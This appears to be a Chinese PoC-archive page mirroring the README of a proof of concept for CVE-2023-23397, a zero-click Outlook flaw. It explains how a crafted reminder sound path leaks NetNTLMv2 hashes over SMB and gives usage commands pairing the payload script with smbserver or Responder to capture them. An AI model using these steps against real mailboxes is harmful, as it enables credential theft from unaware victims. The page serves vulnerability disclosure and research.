关联漏洞
标题:
Microsoft Outlook 安全漏洞
(CVE-2023-23397)
描述:Microsoft Outlook是美国微软(Microsoft)公司的一套电子邮件应用程序。 Microsoft Outlook存在安全漏洞。以下产品和版本受到影响:Microsoft Office LTSC 2021 for 32-bit editions,Microsoft Outlook 2016 (32-bit edition),Microsoft Office LTSC 2021 for 64-bit editions,Microsoft 365 Apps for Enterprise for
描述
Simple PoC of the CVE-2023-23397 vulnerability with the payload sent by email.
介绍
# CVE-2023-23397
Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client.
## Description
Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability).
An attacker exploiting this vulnerability retrieves a NetNTLMv2 digest based on the password of the trapped user through an SMB request. The request is triggered as soon as the mail arrives in the inbox.
## What does the poc do?
1. Generated `.msg` payload.
2. Send it by email with custom SMTP server.
## Usage
In one session :
```python
python CVE-2023-23397.py
usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path
python CVE-2023-23397.py --path '\\yourip\'
```
In a second session (`smbserver` or `responder` as you want).
```
smbserver.py -smb2support SHARE .
```
## Demo (manual poc)

## Explanatory video (french speaking)
[](https://youtube.com/shorts/6bhJPwFgs8Q)
## Original article
https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/
文件快照
[4.0K] /data/pocs/7b5a767ca71d9a0fa79a893a09d305d74660e2ca
├── [2.5K] CVE-2023-23397.py
├── [2.6M] poc.gif
└── [1.4K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。